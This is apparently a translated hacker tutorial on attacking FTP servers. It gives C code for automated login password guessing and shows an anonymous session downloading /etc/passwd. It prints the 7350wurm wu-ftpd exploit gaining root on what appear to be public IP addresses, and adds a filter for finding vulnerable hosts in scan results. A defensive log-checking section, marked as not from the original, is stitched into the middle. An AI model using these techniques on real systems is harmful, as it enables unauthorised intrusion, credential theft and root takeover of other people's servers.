
FTP Attacks

Honestly there is nothing special here; I am just dragging out the old stuff and writing it up again. Attacks on FTP boil down to two things: guessing user passwords and overflowing the FTP server. So let us walk through things you probably already know well. Guessing user passwords: almost every scanner has this feature. Always using other people's tools feels a bit embarrassing, like living under someone else's roof; I wonder whether you feel the same. And do you actually understand how a scanner finds the usernames and passwords? It is not hard. When you connect to an FTP server with the ftp command on the command line, you can guess passwords that way too, by hand, but that is far too slow, so you write something yourself to speed it up.

D:>ftp
ftp>open 192.168.25.1
Connected to 192.168.25.1.
220 chi-1 Microsoft FTP Service (Version 5.0)
User (192.168.25.1:(none)):anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: (not echoed)
530 User 111@ cannot log in.
Login failed

The above is an FTP login session. What actually happens is that the ftp client sends USER anonymous to the server, the server returns a reply code (331 above), and then it waits for you to send PASS xxxxx; if that succeeds you are logged in, otherwise you retry.

/**************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <sys/socket.h>

......................

int ftp_crack(char *username, char *password, int sock) /* sock is an FTP connection built with socket() */
{
    char *buffer = malloc(1024);
    int n;

    if (buffer == NULL)
        return -1;

    recv(sock, buffer, 1023, 0);                 /* swallow the 220 banner */
    bzero(buffer, 1024);

    sprintf(buffer, "USER %s\n", username);       /* write USER into buffer */
    send(sock, buffer, strlen(buffer), 0);        /* send it with send() */
    printf("Try username %s \n", username);

    recv(sock, buffer, 1023, 0);                 /* the 331 reply */
    bzero(buffer, 1024);
    sprintf(buffer, "PASS %s\n", password);
    send(sock, buffer, strlen(buffer), 0);        /* send PASS */

    n = recv(sock, buffer, 1023, 0);
    if (n < 0)
        n = 0;
    buffer[n] = '\0';                             /* terminate the reply before strstr/printf */
    printf("Reply : %s \n", buffer);

    if (strstr(buffer, "incorrect") == NULL) {    /* decide whether it worked; "incorrect" can be changed, e.g. to "failt" for a Windows FTP server */
        printf("\nFound the password %s for user %s\n", password, username);
        free(buffer);
        return 1;
    }
    free(buffer);
    return 0;
}

..................

/***************************************************************/

The above is one piece of the code [full code]; with it, checking passwords can be automated!

Another thing still very common on the net is that many FTP servers let you log in as anonymous or guest. By itself that is nothing, but it can still be put to use: for instance you can use the CWD command to probe for users, and some FTP servers, lacking handling for certain byte sequences in paths such as ..../.../, let you download passwd.

ftp> open 192.168.25.3
Connected to 192.168.25.3
220 chi FTP server (version wu-2.6.2.5) ready.
User (192.168.25.3:(none)): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password: (I typed anonymous and it let me in)
230-The response 'anonymous' is not valid
230-Next time please use your e-mail address as your password
230- for example: [email protected]
230 Guest login ok, access restrictions apply.
ftp>cd /etc
250 CWD command successful.
ftp>ls
200 PORT command successful.
550 Bad directory components
ftp>get passwd
150 Opening ASCII mode data connection for passwd (79 bytes).
226 Transfer complete.
ftp: 84 bytes received in 0.00Seconds 84000.00Kbytes/sec.
ftp>

In your current directory on your own machine you will now find the passwd file; open it in a text editor. Most of them look like the following:

root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/nonexistent
operator:*:2:20:System &:/usr/guest/operator:/bin/csh
bin:*:3:7:Binaries Commands and Source,,,:/:/nonexistent
games:*:7:13:Games pseudo-user:/usr/games:/nonexistent
news:*:8:8:News Subsystem:/:/nonexistent
man:*:9:9:Mister Man Pages:/usr/share/man:/nonexistent
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico
xten:*:67:67:X-10 daemon:/usr/local/xten:/nonexistent
pop:*:68:6:Post Office Owner:/nonexistent:/nonexistent
ftp:*:999:999:anonymous ftp account:/home/ftp:/bin/csh
nobody:*:65534:65534:Unprivileged user:/nonexistent:/nonexistent
joe:*:1001:1001:User &:/home/joe:/bin/csh
norm:*:1000:1000:Norman Rossman:/home/norm:/bin/csh
khan:*:1008:1008:RobRose Net, khans.com, Robert Jenkins:/home/khan:/bin/csh
robrose:*:1056:1056:Robert Jenkins, robrose.com:/home/robrose:/bin/csh
secret:*:1002:1002:secretoflife.com:/home/secret:/bin/csh

It is shadowed, but that does not matter much; machines like this are rare now anyway, and at the very least we now know the other side's usernames! Another way to get usernames is the CWD command, but that method is not very practical.
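Seen from the server side, both things described so far leave a trace in the FTP server log: the USER/PASS retry loop shows up as a run of failed logins from one client address, and an anonymous session that fetches /etc/passwd shows up as a download record. The following is an added example, not code from the original post: a small C program that parses server log lines in the style vsftpd writes (that format is an assumption here, and the sample lines are constructed, not real captures), counts failed logins per client address so a burst can be flagged, and flags any anonymous/ftp download from under /etc/.

```c
#include <stdio.h>
#include <string.h>

/* Kinds of log event this checker cares about. */
typedef enum { EV_OTHER, EV_FAIL_LOGIN, EV_OK_LOGIN, EV_OK_DOWNLOAD } event_kind;

typedef struct {
    event_kind kind;
    char user[64];
    char ip[64];
    char path[256];   /* only filled in for EV_OK_DOWNLOAD */
} ftp_event;

/* Constructed sample log (assumed vsftpd-style format, not real captures):
   <date> [pid N] [user] <RESULT> <OP>: Client "<ip>"[, "<path>", ...] */
static const char *SAMPLE_LOG[] = {
    "Mon Feb 24 13:25:01 2003 [pid 2101] [anonymous] FAIL LOGIN: Client \"192.168.25.1\"",
    "Mon Feb 24 13:25:02 2003 [pid 2101] [chi] FAIL LOGIN: Client \"192.168.25.1\"",
    "Mon Feb 24 13:25:03 2003 [pid 2101] [root] FAIL LOGIN: Client \"192.168.25.1\"",
    "Mon Feb 24 13:25:04 2003 [pid 2101] [guest] FAIL LOGIN: Client \"192.168.25.1\"",
    "Mon Feb 24 13:25:05 2003 [pid 2101] [joe] FAIL LOGIN: Client \"192.168.25.1\"",
    "Mon Feb 24 13:26:10 2003 [pid 2102] [anonymous] OK LOGIN: Client \"192.168.25.7\", anon password \"anonymous\"",
    "Mon Feb 24 13:26:12 2003 [pid 2102] [anonymous] OK DOWNLOAD: Client \"192.168.25.7\", \"/etc/passwd\", 79 bytes, 84.00Kbyte/sec",
    "Mon Feb 24 13:27:00 2003 [pid 2103] [norm] FAIL LOGIN: Client \"192.168.25.9\"",
    "Mon Feb 24 13:27:05 2003 [pid 2103] [norm] OK LOGIN: Client \"192.168.25.9\"",
    "Mon Feb 24 13:27:20 2003 [pid 2103] [norm] OK DOWNLOAD: Client \"192.168.25.9\", \"/pub/README\", 512 bytes, 10.00Kbyte/sec",
};
#define SAMPLE_LOG_LEN ((int)(sizeof SAMPLE_LOG / sizeof SAMPLE_LOG[0]))

/* Copy the text between the quote at *start and the next quote into out. */
static int extract_quoted(const char *start, char *out, size_t outlen)
{
    const char *end;
    size_t len;
    if (*start != '"' || (end = strchr(start + 1, '"')) == NULL)
        return 0;
    len = (size_t)(end - start - 1);
    if (len >= outlen)
        len = outlen - 1;
    memcpy(out, start + 1, len);
    out[len] = '\0';
    return 1;
}

/* Parse one log line into an ftp_event; returns 1 on success, 0 if the line is not understood. */
static int parse_event(const char *line, ftp_event *ev)
{
    const char *ub, *ue, *client, *q;
    memset(ev, 0, sizeof *ev);
    ub = strstr(line, "] [");                    /* user is the second bracketed field */
    if (ub == NULL || (ue = strchr(ub += 3, ']')) == NULL)
        return 0;
    snprintf(ev->user, sizeof ev->user, "%.*s", (int)(ue - ub), ub);
    if (strstr(line, "FAIL LOGIN:"))        ev->kind = EV_FAIL_LOGIN;
    else if (strstr(line, "OK LOGIN:"))     ev->kind = EV_OK_LOGIN;
    else if (strstr(line, "OK DOWNLOAD:"))  ev->kind = EV_OK_DOWNLOAD;
    else                                    ev->kind = EV_OTHER;
    client = strstr(line, "Client \"");
    if (client == NULL || !extract_quoted(client + 7, ev->ip, sizeof ev->ip))
        return 0;
    if (ev->kind == EV_OK_DOWNLOAD) {            /* the path is the quoted field after the client */
        q = strstr(client, "\", \"");
        if (q == NULL || !extract_quoted(q + 3, ev->path, sizeof ev->path))
            return 0;
    }
    return 1;
}

/* Number of FAIL LOGIN records from one client address. */
static int failed_logins_from(const char **lines, int n, const char *ip)
{
    int i, count = 0;
    ftp_event ev;
    for (i = 0; i < n; i++)
        if (parse_event(lines[i], &ev) && ev.kind == EV_FAIL_LOGIN && strcmp(ev.ip, ip) == 0)
            count++;
    return count;
}

/* A client that fails at least `threshold` logins is treated as a guessing source. */
static int is_bruteforce_source(const char **lines, int n, const char *ip, int threshold)
{
    return failed_logins_from(lines, n, ip) >= threshold;
}

/* Downloads by the anonymous/ftp account of anything under /etc/ (e.g. a leaked passwd). */
static int anonymous_sensitive_downloads(const char **lines, int n)
{
    int i, count = 0;
    ftp_event ev;
    for (i = 0; i < n; i++) {
        if (!parse_event(lines[i], &ev) || ev.kind != EV_OK_DOWNLOAD)
            continue;
        if ((strcmp(ev.user, "anonymous") == 0 || strcmp(ev.user, "ftp") == 0)
            && strncmp(ev.path, "/etc/", 5) == 0)
            count++;
    }
    return count;
}

int main(void)
{
    printf("failed logins from 192.168.25.1: %d (guessing: %s)\n",
           failed_logins_from(SAMPLE_LOG, SAMPLE_LOG_LEN, "192.168.25.1"),
           is_bruteforce_source(SAMPLE_LOG, SAMPLE_LOG_LEN, "192.168.25.1", 5) ? "yes" : "no");
    printf("anonymous downloads under /etc/: %d\n",
           anonymous_sensitive_downloads(SAMPLE_LOG, SAMPLE_LOG_LEN));
    return 0;
}
```

The threshold of five failures is a constructed value; in practice it is tuned per server, and the same two checks map directly onto the fixes: lock out or rate-limit addresses that keep failing USER/PASS, and disable anonymous access (or chroot it into a tree that holds no /etc) so a guest session cannot fetch passwd at all.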

Next comes overflowing the FTP server; the one you see most often on the net is the wu-ftpd overflow attack!

Red Hat Linux release 7.3 (Valhalla)
Kernel 2.4.18-3 on an i686
login: chi
Password:
Last login: Mon Feb 24 13:25:17 from 192.168.25.1
[chi@chi chi]$ ls
7350wurm guest.c openssl-too-open.tar.gz
dsniff-2.3-2.i386.rpm ncurses4-5.0-5.i386.rpm sniffit-0.3.7beta-1.i386.rpm
guest openssl-too-open
[chi@chi chi]$ ./7350wurm
7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2)
team teso (thx bnuts, tomas, synnergy.net !).
Compiled for MnM 01/12/2001..pr0t!
usage: ./7350wurm [-h] [-v] [-a] [-D] [-m]
[-t <num>] [-u <user>] [-p <pass>] [-d host]
[-L <retloc>] [-A <retaddr>]
-h this help
-v be verbose (default: off, twice for greater effect)
-a AUTO mode (target from banner)
-D DEBUG mode (waits for keypresses)
-m enable mass mode (use with care)
-t num choose target (0 for list, try -v or -v -v)
-u user username to login to FTP (default: "ftp")
-p pass password to use (default: "mozilla@")
-d dest IP address or fqhn to connect to (default: 127.0.0.1)
-L loc override target-supplied retloc (format: 0xdeadbeef)
-A addr override target-supplied retaddr (format: 0xcafebabe)
[chi@chi chi]$ ./7350wurm -t 0
num . description
----+-------------------------------------------------------
1 | Caldera eDesktop|eServer|OpenLinux 2.3 update [wu-ftpd-2.6.1-13OL.i386.rpm]
2 | Debian potato [wu-ftpd_2.6.0-3.deb]
3 | Debian potato [wu-ftpd_2.6.0-5.1.deb]
4 | Debian potato [wu-ftpd_2.6.0-5.3.deb]
5 | Debian sid [wu-ftpd_2.6.1-5_i386.deb]
6 | Immunix 6.2 (Cartman) [wu-ftpd-2.6.0-3_StackGuard.rpm]
7 | Immunix 7.0 (Stolichnaya) [wu-ftpd-2.6.1-6_imnx_2.rpm]
8 | Mandrake 6.0|6.1|7.0|7.1 update [wu-ftpd-2.6.1-8.6mdk.i586.rpm]
9 | Mandrake 7.2 update [wu-ftpd-2.6.1-8.3mdk.i586.rpm]
10 | Mandrake 8.1 [wu-ftpd-2.6.1-11mdk.i586.rpm]
11 | RedHat 5.0|5.1 update [wu-ftpd-2.4.2b18-2.1.i386.rpm]
12 | RedHat 5.2 (Apollo) [wu-ftpd-2.4.2b18-2.i386.rpm]
13 | RedHat 5.2 update [wu-ftpd-2.6.0-2.5.x.i386.rpm]
14 | RedHat 6.? [wu-ftpd-2.6.0-1.i386.rpm]
15 | RedHat 6.0|6.1|6.2 update [wu-ftpd-2.6.0-14.6x.i386.rpm]
16 | RedHat 6.1 (Cartman) [wu-ftpd-2.5.0-9.rpm]
17 | RedHat 6.2 (Zoot) [wu-ftpd-2.6.0-3.i386.rpm]
18 | RedHat 7.0 (Guinness) [wu-ftpd-2.6.1-6.i386.rpm]
19 | RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]
20 | RedHat 7.2 (Enigma) [wu-ftpd-2.6.1-18.i386.rpm]
21 | SuSE 6.0|6.1 update [wuftpd-2.6.0-151.i386.rpm]
22 | SuSE 6.0|6.1 update wu-2.4.2 [wuftpd-2.6.0-151.i386.rpm]
23 | SuSE 6.2 update [wu-ftpd-2.6.0-1.i386.rpm]
24 | SuSE 6.2 update [wuftpd-2.6.0-121.i386.rpm]
25 | SuSE 6.2 update wu-2.4.2 [wuftpd-2.6.0-121.i386.rpm]
26 | SuSE 7.0 [wuftpd.rpm]
27 | SuSE 7.0 wu-2.4.2 [wuftpd.rpm]
28 | SuSE 7.1 [wuftpd.rpm]
29 | SuSE 7.1 wu-2.4.2 [wuftpd.rpm]
30 | SuSE 7.2 [wuftpd.rpm]
31 | SuSE 7.2 wu-2.4.2 [wuftpd.rpm]
32 | SuSE 7.3 [wuftpd.rpm]
33 | SuSE 7.3 wu-2.4.2 [wuftpd.rpm]
34 | Slackware 7.1
[chi@chi chi]$ ./7350wurm -a -d 62.163.38.207
# trying to log into 62.163.38.207 with (ftp/mozilla@) ...
failed to connect (user/pass correct?)
[chi@chi chi]$ ./7350wurm -a -d 62.163.35.119
# trying to log into 62.163.35.119 with (ftp/mozilla@) ... connected.
# banner: 220 odin.bilskirner.net FTP server (Version wu-2.6.1-16.7x.1) ready.
# successfully selected target from banner
### TARGET: RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]
# 1. filling memory gaps
# 2. sending bigbuf + fakechunk
building chunk: ([0x0807314c] = 0x08085f98) in 238 bytes
# 3. triggering free(globlist[1])
##################################################
uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp)
Linux 2.2.16-3 #1 Mon Jun 19 18:10:14 EDT 2000 i686 unknown
ls -al
total 24
drwxr-xr-x 6 root root 4096 Apr 13 16:14 .
drwxr-xr-x 37 root root 4096 Feb 8 18:23 ..
d--x--x--x 2 root root 4096 Jul 12 2000 bin
d--x--x--x 2 root root 4096 Jul 12 2000 etc
drwxr-xr-x 2 root root 4096 Jul 12 2000 lib
drwxr-sr-x 2 root ftp 4096 Feb 5 2000 pub
.......

As for how to get the other host's banner: you can scan with SuperScan. Scan a large range, scanning only port 21 and showing the host responses; when it is done you can look through them one by one, and whenever you see wu-ftp you can give it a try. I personally found that tiring, so I wrote a little thing that boils SuperScan's results down. Just compile it with TC and you are set! [download]

/***********************************************************************************/

#include <stdio.h>
#include <stdlib.h>

/* Copy to <outputfile> only those lines of a SuperScan result file whose
   banner contains "wu" (i.e. a wu-ftpd server). */
int main(int argc, char *argv[])
{
    FILE *in;
    FILE *out;
    char buf[1024];
    int i;

    if (argc < 3) {
        printf("usage : %s <inputfile> <outputfile>\n", argv[0]);
        exit(1);
    }
    in = fopen(argv[1], "r");
    if (in == NULL) {
        puts("File open error");
        exit(1);
    }
    out = fopen(argv[2], "w");
    if (out == NULL) {
        puts("File write error");
        fclose(in);
        exit(1);
    }
    while (fgets(buf, sizeof buf, in) != NULL) {
        /* look for "wu" in the first 51 characters of the line, stopping at the terminator */
        for (i = 0; i <= 50 && buf[i] != '\0'; i++) {
            if (buf[i] == 'w' && buf[i + 1] == 'u') {
                fputs(buf, out);
                break;              /* write each matching line once */
            }
        }
    }
    fclose(in);
    fclose(out);
    return 0;
}

/*****************************************************************************************/